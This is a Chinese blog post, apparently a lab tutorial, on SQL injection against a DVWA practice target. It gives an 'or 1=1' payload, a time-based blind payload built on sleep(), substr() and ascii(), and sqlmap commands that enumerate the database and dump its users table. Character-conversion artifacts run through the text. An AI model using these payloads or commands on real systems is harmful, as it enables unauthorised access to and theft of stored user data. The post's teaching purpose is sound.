手工加sqlmap測(cè)試靶機(jī)SQL注入

1.非盲注(頁(yè)面顯示查詢(xún)結(jié)果):

通過(guò)burpsuite抓包,獲取到post形式請(qǐng)求的id參數(shù)有漏洞,并直接用“or 1=1”獲取到全部的用戶(hù)名信息:

手工獲取全部用戶(hù)名

2.盲注:

利用sleep(5)函數(shù),substr()函數(shù),ascii()函數(shù)等判斷:如下:
Payload: id =2 and if(ascii(substr(database(),1,1))=100, sleep(5), null),當(dāng)database()返回的當(dāng)前數(shù)據(jù)庫(kù)名第一個(gè)字符的ascii值是100,即為’d’時(shí),那么執(zhí)行sleep(5)暫停5秒 才返回。觀(guān)察請(qǐng)求返回時(shí)間,判斷是否第一個(gè)字符為’d’。如下:

盲注

箭頭所指的地方是response,在響應(yīng),說(shuō)明第一個(gè)字符是’d’。后續(xù)利用同樣的方法判斷,得到’dvwa’數(shù)據(jù)庫(kù)名。

3.用sqlmap測(cè)試:

(1)先將發(fā)送的請(qǐng)求頭(這里以盲注請(qǐng)求頭為例)保存為一個(gè)request.txt文件,并放置在sqlmap目錄下

image.png

(2)在cmd下輸入:python sqlmap.py -r request.txt -p id, 得到輸出:

image.png

由上面可看出,sqlmap已經(jīng)將后臺(tái)的數(shù)據(jù)庫(kù),服務(wù)器及漏洞參數(shù)信息測(cè)試出來(lái)。
(3)然后輸入: python sqlmap.py -r request.txt -p id --dbms mysql --current-db
image.png

(4)然后列出當(dāng)前數(shù)據(jù)庫(kù)中的表:Python sqlmap.py -r request.txt -p id --dbms mysql -D dvwa --tables,得到如下圖所示的表:
image.png

(5)然后列出響應(yīng)表的字段內(nèi)容:
python sqlmap.py -r request.txt -p id --dbms=mysql -D dvwa -T users --dump
image.png

可看到已經(jīng)將users表中的數(shù)據(jù)打印并保存到C盤(pán)目錄下一個(gè)csv文件里,找到打開(kāi):


image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀(guān)點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容